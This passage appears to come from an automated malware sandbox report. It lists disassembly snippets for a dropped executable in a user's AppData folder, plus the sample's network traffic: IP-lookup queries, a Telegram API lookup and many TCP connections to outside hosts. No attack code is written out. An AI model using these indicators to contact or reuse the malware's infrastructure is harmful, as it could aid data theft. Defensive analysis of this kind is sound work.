                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064B0B2h7_2_0064ADB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00644C51h7_2_00644980
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064B57Ah7_2_0064B280
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064E082h7_2_0064DD88
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00642C69h7_2_00642998
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00649D92h7_2_00649A98
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0072033Ah7_2_00720040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00721B22h7_2_00721828
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0072330Ah7_2_00723010
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00721FEAh7_2_00721CF0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 007237D2h7_2_007234D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00721192h7_2_00720E98
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0072297Ah7_2_00722680
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0072165Ah7_2_00721360
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00722E42h7_2_00722B48
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00720802h7_2_00720508
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00720CCAh7_2_007209D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 007224B3h7_2_007221B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00723C9Ah7_2_007239A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC55D9h7_2_00BC5330
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCEC49h7_2_00BCE978
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC9B59h7_2_00BC98B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCF579h7_2_00BCF2A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC8E51h7_2_00BC8BA8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC8149h7_2_00BC7EA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC7441h7_2_00BC7198
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC6739h7_2_00BC6490
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC5A31h7_2_00BC5788
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCE1C5h7_2_00BCDE88
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCD429h7_2_00BCD180
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC4D29h7_2_00BC4A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC85A1h7_2_00BC82F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC7899h7_2_00BC75F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC6B91h7_2_00BC68E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC5E89h7_2_00BC5BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCE7B1h7_2_00BCE4E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC5181h7_2_00BC4ED8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCD881h7_2_00BCD5D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCCB7Bh7_2_00BCC8D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC4479h7_2_00BC41D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCBE71h7_2_00BCBBC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC3771h7_2_00BC34C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCB169h7_2_00BCAEC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC62E1h7_2_00BC6038
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCDCD9h7_2_00BCDA30
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCCFD1h7_2_00BCCD28
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC48D1h7_2_00BC4628
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCC2C9h7_2_00BCC020
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC3BC9h7_2_00BC3920
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCB5C1h7_2_00BCB318
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCF0E1h7_2_00BCEE10
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC92A9h7_2_00BC9000
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC4021h7_2_00BC3D78
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCC721h7_2_00BCC478
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCBA19h7_2_00BCB770
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC3319h7_2_00BC3070
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCAD11h7_2_00BCAA68
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC9701h7_2_00BC9458
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC89F9h7_2_00BC8750
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC7CF1h7_2_00BC7A48
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BCFA11h7_2_00BCF740
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00BC6FE9h7_2_00BC6D40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00C32AF1
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00C32B00
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00C35F28
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_00C35F38
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: checkip.dyndns.org
                  Source: global trafficDNS query: name: reallyfreegeoip.org
                  Source: global trafficDNS query: name: api.telegram.org
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49170 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 158.101.44.242:80
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 132.226.8.169:80
                  Source: global trafficTCP traffic: 192.168.2.22:49178 -> 132.226.247.73:80
                  Source: global trafficTCP traffic: 192.168.2.22:49180 -> 193.122.130.0:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49169 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49173 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49182 -> 149.154.167.220:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.84.38:80
                  Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49164
